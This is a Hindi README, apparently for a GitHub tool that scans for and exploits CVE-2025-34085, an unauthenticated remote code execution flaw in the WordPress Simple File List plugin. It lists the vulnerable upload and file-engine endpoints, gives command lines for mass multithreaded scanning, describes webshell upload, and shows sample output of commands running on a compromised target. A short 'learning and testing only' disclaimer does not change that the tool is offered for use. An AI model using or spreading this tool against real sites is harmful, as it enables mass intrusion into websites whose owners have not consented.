
CVE-2025-34085 के लिए स्वचालित स्कैनर और एक्सप्लॉइट, जो WordPress Simple File List प्लगइन में एक अनऑथेंटिकेटेड RCE है। मल्टी-टार्गेट स्कैनिंग, वेबशेल अपलोड और रिमोट कमांड निष्पादन का समर्थन करता है।
स्वचालित उपकरण जो WordPress Simple File List प्लगइन में अनप्रमाणित Remote Code Execution (RCE) का पता लगाने और उसका शोषण करने के लिए है, विशेष रूप से CVE-2025-34085 के प्रति संवेदनशील।
बड़े पैमाने पर कुशलता के लिए स्वचालित लक्ष्य सफाई प्रणाली और मल्टीथ्रेड समर्थन से सुसज्जित।
बिना प्रमाणीकरण के फ़ाइल अपलोड
/wp-content/plugins/simple-file-list/ee-upload-engine.phpफ़ाइल का नाम बदलकर .php करें
/wp-content/plugins/simple-file-list/ee-file-engine.phpरिमोट पेलोड निष्पादन
python3 main.py -u http://target.com --cmd "id"
targets.txt फ़ाइल में लक्ष्यों की सूची रखें, प्रति पंक्ति एक:
python3 main.py --cmd "uname -a"
| तर्क | विवरण |
|---|---|
-u | एकल लक्ष्य (उदाहरण: http://example.com) |
--cmd | लक्ष्य पर निष्पादित किया जाने वाला आदेश (डिफ़ॉल्ट: id) |
--inline | इनलाइन पेलोड का उपयोग करें (बिना ?cmd= पैरामीटर के) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
सफल लक्ष्य स्वचालित रूप से vuln.txt फ़ाइल में सहेजे जाएंगे।
main.py — मुख्य स्क्रिप्टtargets.txt — लक्ष्यों की सूचीclean_targets.txt — URL सामान्यीकरण परिणामvuln.txt — सफलतापूर्वक शोषित लक्ष्यों का लॉगtargets.txt से URL प्रारूप ठीक करता हैWordPress साइट प्रशासकों को सलाह दी जाती है:
यह परियोजना केवल वैध सीखने और परीक्षण के लिए है।
अवैध उद्देश्यों के लिए उपयोग प्रत्येक व्यक्ति की अपनी जिम्मेदारी है।
Cyberlone इंडोनेशिया इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।
लाइसेंस: MIT License
कृपया वैध और जिम्मेदार उद्देश्यों के लिए स्वतंत्र रूप से उपयोग, संशोधन और वितरित करें।
Cyberlone इंडोनेशिया
🛠️ अनुसंधान और शोषण टीम
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n